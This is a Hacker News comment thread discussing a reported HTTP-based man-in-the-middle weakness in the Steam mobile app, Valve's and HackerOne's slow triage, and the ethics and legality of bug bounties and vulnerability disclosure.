Here's a story about someone with a decent but low-severity finding, apparently a duplicate of someone else's (unsurprisingly, since it's pretty obvious once you actually look at this app) who had a hard time getting Valve to take that finding seriously. It looks like H1's triage did not-the-greatest job in vetting the submission; also: not unheard-of.

And? I'm not sure there's a punch line here? "Tech worker has unsatisfying customer support experience with first-level security tech support" doesn't make for a zippy headline, but I think it sums up the story.


Is the issue HackerOne, or is it HackerOne doing as Valve (their client) instructed them? It seems Valve were aware of the issue for weeks or months before he reported it and still hadn't added an "s" to "http" after 3 more months. Why is that?


This HackerOne thing seems weird. It's like they looked at Google and decided "let's apply their customer service, but for security researchers." With this model, things like this blog post inevitably follow -- including the "they ignored me until I complained on Twitter, then they instantly fixed it". (Classic.)

I took djb's "Unix security holes" class in 2004 and he advocated for just disclosing the security hole immediately, things like this haven't changed my mind. I know people want the money, but it's peanuts and doesn't seem worth the hassle unless you're really young. Nobody is going to spend months looking for obscure bugs for $10,000 when they could get paid that in a week to write the bugs (accidentally) in the first place.

It all makes very little sense to me. If you care about security, you'll have a team like Project Zero. Anything else is just applying the "gig economy" to engineering work, and the results are pretty predictable. It's kind of sad.


Important life lesson: drop 0days on twitter, you wont get bounties, but at least you will get recognition and job offers.


My guess is that, like the crypto wars, disclosure fights are going to happen every generation.

There was a big discussion about this in the 90s. Vendors would sit on bugs forever, frequently simply to suppress knowledge of them rather than fixing them. Hackers rebelled; some simply published what we now call 0days, others would publish on a non-negotiable timeline. Eventually, "responsibly disclosure" became a norm.

Looks like companies have once more figured out how to game the process, so their counter-parties are going to renegotiate. And the cycle of life is complete.


This. F responsible disclosure.


I feel like OP should have made an initial concise statement: "I will publish this in 60 days. Your move."


Apparently Microsoft hired SandboxEscaper, notorious non responsible disclosure 0day dropper, proving my point rather succinctly. https://twitter.com/SandboxBear/status/1210133985478791171

No tedious 3 day whiteboard interviews there I bet.


This is an overall problem at bigger companies. The machinations that decide priorities often do not understand engineering things and thus never prioritize the fixes. It's not uncommon to see engineering items that would take 30 minutes to fix get hours of engineering man hours in discussion about "should we fix it?" and "when?" .

I tend to sneak these little things into my PRs cause I cant stand to see them linger w/o cause


I’d like to add a different take to this. I have contacted Valve support in the past, clearly stated my problem, and got a response that looked like they read half of my question and responded without reading the entire thing. If the same team that responds to their customer support reads this stuff, which seems crazy, they didn’t bother to understand the problem before responding.


I don't get the "this issue is a duplicate so we won't pay" business. If I find a serious issue that's still unpatched and someone tells me "Ops it's a duplicate sorry!" I'm still going to ask for payment. If I don't get it, it's a given that I'm going public - assuming it is legal to do so -. Why doesn't everyone do that?

I'll go even further and say that price negotiation should happen at every disclosure. If you're not satisfied with the price you're getting, go ahead and make the vulnerability public ASAP - assuming it is legal to do so -. It's about time companies that have invested nothing in security compared to their profits and their parasitic middlemen like HackerOne acquire proper incentives. Right now, they are getting away with having the public subsidize their security procedures AT MASSIVELY REDUCED costs. This has to stop.


> If I find a serious issue that's still unpatched and someone tells me "Ops it's a duplicate sorry!" I'm still going to ask for payment. If I don't get it, it's a given that I'm going public.

Probably because I think what you've just described could be viewed as extortion, which is illegal in many locations? Also, it doesn't really do you any favors, I think. You'll get a week or less of recognition as finding an exploit, and then the story will come out how you both sniped someone else's find and possibly caused damage on purpose for your five minutes of fame.

To be clear, it's the initial monetary request and actions because it was denied that makes this entirely mercenary and would not reflect well on you. You were obviously willing to sit on the exploit for a while for some cash, so you no longer have any moral arguments to rely on for your behavior if you release it immediately, and the fact that it's not original just makes it worse. I imagine your reputation for security matters might never recover.

There are ways to get the moral defense back, but it requires waiting a while to see if it actually gets fixed and not taking it public immediately (so it actually is for their unresponsiveness and not just because they didn't pay).


I do not understand why HackerOne has such good reputation. My experiences are almost uniformly bad.


The reputation was earned years ago.


I don't think they have a good reputation.


>This means 1 of 2 things:

>They're trying to get out of paying bug bounty money: I guess this is the more extreme perspective to take here, but considering the whole experience, a definitely possible one. I wasn't here for the bug bounty money, I have work by this point, but if there's some younger child trying to get into security research doing this, this could be enough to massively demotivate them if they were promised it from the HackerOne page.

>They had someone who posted the same bug either weeks or months in advance: This means that Valve left someone else hanging for an insanely long time. This is equally messed up.

I can't understand that in the age of blockchain buzzword bullshitting companies, in one instance where the immutable public ledger would actually be useful (for instance with sha512 hash of initial report) it isn't used. It wouldn't be very complicated and it would immensely help their trustworthiness.


I've had or heard quite a few conversations about patent bounties inside of companies that love patents, and there's a very common rule (that ends up being gamed) that each of the first N contributors gets X dollars, and if more than N authors exist then they all split NX dollars.

Unfortunately such a strategy could also be gamed by a bug bounty. If I split 150% of the bounty between all people who reported the bug within a time interval, I could just tell a buddy who has moved out of town about it and end up with a bit more money between the two of us. Either in exchange for him giving me half his bounty, or by returning the favor later.


I don't think that splitting is usually necessary. If the company can prove that someone already reported it and there are not too long delays to fix the vulnerability, I would think that people would accept that this time they were not the first and they will try next time knowing that no one tries to screw them.


I have gone thru similar issues with Valve/Hackerone recently... https://hexpwn.github.io/2020/two-plus-year-old-steam-vulner...


Valve is notorious for ignoring any vulnerability reports


any other sources?


Only anecdotal, I once tried to report a persistent XSS issue on the game "hub" pages. After weeks of going back and forth with support (this was before the likes of hackerone) the ticket was closed and the issue was ignored.


On the other hand, before they started moving to HackerOne, they fixed several issues I reported either the next day or within a week or so. Their security@ was incredibly responsive.

Now it seems it takes forever (I have reports waiting to be paid from them too, even ones they have already fixed.)


Yup. Have dozens of issues reported to security@, and responsiveness was great- usually human response same day, often in hours. H1 is veeeery slow by comparison, but, hey, I've made five figures off it so...




>For a simple MITM exploit that can be fixed by replacing "http://" with "https://", this is simply unacceptable.

I think the author is really not understanding the complexity of updating to an https:// url inside of a mobile applicaiton. Valve is most likely using a self signed cert so that would require bundling the certification in with the app so that Apple/Android allowed it to load inside of a webview. This is not nearly as simple as just updating all of the urls in the app to https:// and the fix could very well take a few months. Furthermore, loading the store page is not necessarily a vulnerability to valve as if you are able to re-direct it, you wouldn't have access to any of the Steam user specifics, (like account data). It wouldn't be much different than putting a shady link somewhere on the internet, and people navigating to it.


Why would they use a self signing cert? They could use a real Cert. It's Steam. They can afford real certs, or just use LetsEncrypt.

There is absolutely no reason for the app to connect to a login/authentication service (or any service) over plain text, period! There should be unit tests that scan for http:// and will fail the build if found in the code or resources.

I know some things are not simple fixes, but this is absolutely a fix that can be done and we should all know how to do. It should have also been made a security priority and pushed through.


A self signed cert is a a real cert, its just not provided by an CA authority. I guarantee you this http just redirects to an https location, (just tested it on my own device), so there is no plain text transfer. In the mobile industry this happens all the time as backend endpoints grow and change.


The bottom line is, there's no reason to request the non-HTTPS connection in the first place. And there's apparently no checks in the app to make sure it's connected to their real server.


>The bottom line is, there's no reason to request the non-HTTPS connection in the first place.

The example I gave wasn't to excuse the issue, it was to maybe explain why the fix is taking so long.

> And there's apparently no checks in the app to make sure it's connected to their real server.

I don't think you can make that statement. The description of the issue only attempts to hi-jack the session, he didn't actually try to do anything with it. There may very well be checks in place.


What you are saying makes no sense, why does android only accept the self signed certificate when it redirects from http and not for direct https connections. Can you provide a source, a stackoverflow link maybe where this problem is discussed ?


Steam is not using self-signed certs. store.steampowered.com is their main user-facing storefont.

Why would they "most likely" be using a self-signed cert? That would be an extreme edge-case in my mind, not the standard.


I meant most likely as in a as to why they do the http to https redirect. I have seen this from several other apps, I don't think its extreme, but my guess is just based on the redirect seeming to be intentional. I should probably have said "this could possibly be because", rather than "most likely".


You can't actually do arp spoofing/hijacking at an ISP level. This is because arp/mac addresses don't have much impact on traffic when crossing a layer 3 (network/router) boundary.


Reading stories like this really make me hate these customer service walls we've put up everywhere. Only a couple of times in these exchanges did it seem like there was a functioning, thinking human intelligence on the other end. All of the robo-responses are depressing, including the human-generated ones. And it's even more discouraging when you have to hear about their company's internal chaos and disorganization. Really gives me a low opinion of this HackerOne organization.


Just drop a line on twitter saying you've discovered a vulnerability in $popularSoftware and mention $company. Say you'll be disclosing in 90 days if $company doesn't issue a reply publicly.

Make sure to deal with an actual human and that everything is done according to best practice. You may even get publicity this way and even if it's unethical it can be sold or used to your advantage.

If they care, trust me when I say they will make an effort. Most places (like Google) have effective systems in place for dealing with such queries.


> even if it's unethical

it wouldn't even be unethical. responsible disclosure starts with engaging with company at eye-level. all that these bug bounty platforms do is take away exactly this power and allow the company to consolidate the contract to a single entity (e.g. preferred supplier). they deserve even less respect than any shady recruiter or typical outsourcing sweat-shop.

giving these people power is like talking to a cop without a lawyer - regardless of what they say, they don't have your interest in mind and you have lost before the game has even started.


> Say you'll be disclosing in 90 days if $company doesn't issue a reply publicly.

That's blackmail. An expedient way of getting your door breached.


The idea that your would get a no knock forcible entry for disclosing a bug is appalling and potentially an indictment of our entire criminal justice system.

I'm assuming vntok's legal conclusion and claim of the type of law enforcement response is true (please do not make things up on hackernews).

In which case my former support for the police and low and order is SERIOUSLY diminished.

You have a non-violent offense, that is not an actual offense, and they are doing swat door breaches on you. wow! The priorities of these companies and law enforcement is backwards then.

I guess folks are being told to just sell it to a zero day vendor (which also happens to work for the same govt agency that will bust down your door if you disclose publicly). Pretty appalling behavior here!


"Hey, @WhiteHouse, while interacting with your systems with the intent to find security flaws and obtain unauthorized access (I wrote scanners and tools and payloads so you know I really wanted to succeed here), I've found a security flaw that allows me to launch nuclear warheads from my garage in Misouri. I will publish this info online if you don't meet my demands. You have less than a month to comply."

Yeah, that kind of bullshit won't fly in any sane criminal justice system. Now replace "launch nukes" with "download every movie you're working on" or "flash-crashing the stocks market at any time", you'll see that the argument doesn't change: it doesn't fly anywhere.


No, the disclosure is disconnected from payment, so it's not blackmail. Notifying companies is a courtesy, and considered good form. Companies offering rewards is to incentivize this behavior. Researchers releasing vulnerabilities after a time period no matter what is to incentivize companies to actually fix the problems (not just pay to shut up the researcher). Both are useful for a well functioning system of independent researchers finding vulnerabilities in companies that then get fixed.

Releasing the vulnerability because you weren't paid, regardless of whatever timelines you would have followed? That's blackmail. I imagine having a very clear and consistent policy as a researcher that is not based on money (but can be based on company participation and whether they seem like they are actually trying to fix the problem) will go a long way towards clearing you of any suspicion of blackmail.


That is false. In many jurisdictions, blackmail does not require a financial transaction, merely obtaining something deemed valuable by the blackmailer in exchange for keeping the blackmailee's information private. See [1] for the US:

Whoever, under a threat of informing, or as a consideration for not informing, against any violation of any law of the United States, demands or receives any money or other valuable thing, shall be fined under this title or imprisoned not more than one year, or both.

In cases like this one, "bragging rights" are easy to prove as deemed valuable by the blackmailer: they can bring anything from job prospects to donations from activists to free beers at Blackhat.

[1] https://www.law.cornell.edu/uscode/text/18/873


> merely obtaining something deemed valuable by the blackmailer in exchange for keeping the blackmailee's information private.

Exactly. That's why if you have a policy about when the information goes public which is entirely independent of any benefits provided by the company in question, it's not blackmail.

You're not saying "unless you give me X benefit I do Y", you're saying "I'm doing Y at Z date, but I may extend that if you show you're working on the problem." which isn't a benefit to you specifically, but to those affected. As long as you make sure any benefit to yourself is removed from that decision, I imagine blackmail would be very hard to prove.

Bragging rights aren't really the company's to give, since you have the information and will be making it public, unless someone else beat you to it. In that case, going live early unless the company says you found it does impart a real benefit to you that you extracted from the company. That's not what I viewed this thread as about though. Saying you'll release the vulnerability you were already going to release (if you had a clear policy applied consistently) is not so much a threat as giving the company an appropriate chance to respond.

I agree in the case of private companies with little or no public component it does get less clear cut. I'm not sure what those would be though.


In the US, Blackmail requires a benefit in exchange for not disclosing information.

A public reply isn't much of a benefit, and my understanding is that the vulnerabilities will be disclosed eventually within a reasonably limited timeframe.


Google Project Zero is doing exactly that -- disclosing them in 90 days no matter if they're fixed or not.

This kind of pressure is helpful, because otherwise stories of OP will be dominant and security problems will stay unpatched.


but do they trumpet on twitter that they have an exploit and will release it in 90 days?

that's the difference


They have a public issue tracker (issues are withheld from public for 90 days): https://bugs.chromium.org/p/project-zero/issues/list

and a blog: https://googleprojectzero.blogspot.com/

and a Github org: https://github.com/googleprojectzero

and their members do tweet about their findings on their personal accounts.

But no, they don't have an official Twitter account.


A lovely example of why one shouldn't take legal advice from message boards.

But I would say that if you're doing this sort of thing for the first time, I would strongly advise you to talk to a lawyer who knows this corner of the law, and to someone who has done this before.

Smarts do not substitute for experience and domain-specific knowledge.


That's similar to how project zero (by google) works. Exploits get released in 90 days unless the developers can provide a plausible justification why that deadline can't be reached.


In a way, this is the same problem that we see with tech hiring & recruiting. Most gatekeepers are less technical than the most tehcnical developers they gate-keep, but still necessary because 80-90% of reports(in case of security)/applicants(in case of hiring) are unqualified. Anyone who is qualified enough to screen without false positives can probably get a better job.


Responsible Disclosure does not mean waiting for arbitrary and unilateral decisions from a company just to be undervalued.

If your argument for responsible disclosure equally applies to this post, a $100 payout and to a $100,000 payout - as long as its from the company that needs to patch the exploit, then re-evaluate your argument.


has there ever been good news about hackerone?


I know barely anything about encryption, but this reads to me like the parties involved don't understand that public key cryptography defeats MITM attacks (at least as I understand it)?


The vulnerability is that there was no public key encryption, hence allowing a MiTM to redirect the steam app to their own site.


Wait steam client does not even use https??


If I read it correctly, the mobile app first connects to the store page on http, which then gets redirected to the https version by their server. So probably a typo / misconfiguration in the app. The store itself uses https everywhere. If you intercept the first request you can display whatever you want to the user tho.


How is this a vulnerability?


The vulnerability, on the high level, is that the Steam app doesn't verify that the store page comes from Valve, meaning that if you own a Wifi hotspot you can potentially scam and cheat the users of the Steam app. This wouldn't have been possible with basic use of SSL by the app.

That's what makes this bizarre – the negligence of developers, the triviality of the fix and the complete lack of understanding from people who are supposed to be reviewing security issues.


The report could have been better worded IMO, it hardly explains the trivial issue or the trivial fix. Preferring to go at length about what if the ISP is hacked and other crazy scenarios.

It wouldn't hurt to say that they simply have a typo in the URL. http instead of https.


How is this not? Steam clients are basically glorified web views for the Shop portion and user regularly enter credit card details in them to buy games or hardware. User also might have virtual currency or valuable stuff in their account worth a lot of real money and users trust everything that's inside theses clients.

So by MITM any unencrypted connection to Steam server either credentials or payment info.


The software is vulnerable to a MITM attack. There's no reason it should be.


Frankly, I'm surprised the site didn't respond with a 302 redirect to SSL to avoid this kind of thing entirely (versus relying on client to specify the correct protocol).


The client _must_ use the correct protocol, that's precisely the issue.

An insecure request to switch to a secure protocol would just be elided by an attacker. If the client is coded to expect such a switch and fail if it doesn't happen, that client is at best implementing a more complicated, ad-hoc secure protocol.


I don't follow. That's quite obviously not a proper fix.


How is that vulnerability? If the ISP DNS gets hacked people can intercept traffic. Seriously this is the best attack scenario he could come with with?

From what I understand. It seems the steam app is connecting to plain http http://store.steampowered.com/ so it could be man in the middled.

Unless I am missing something, it's way overblown. Valve please fix the URL to https and send that guy a $50 Amazon voucher.


at this point they should send him $250 for having to deal with their atrocious bureaucracy


> If the ISP DNS gets hacked people can intercept traffic.

Usually machines will follow the DNS server they get from DHCP. You don't have to hack an ISP DNS, just have control over the router the user is connected to.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: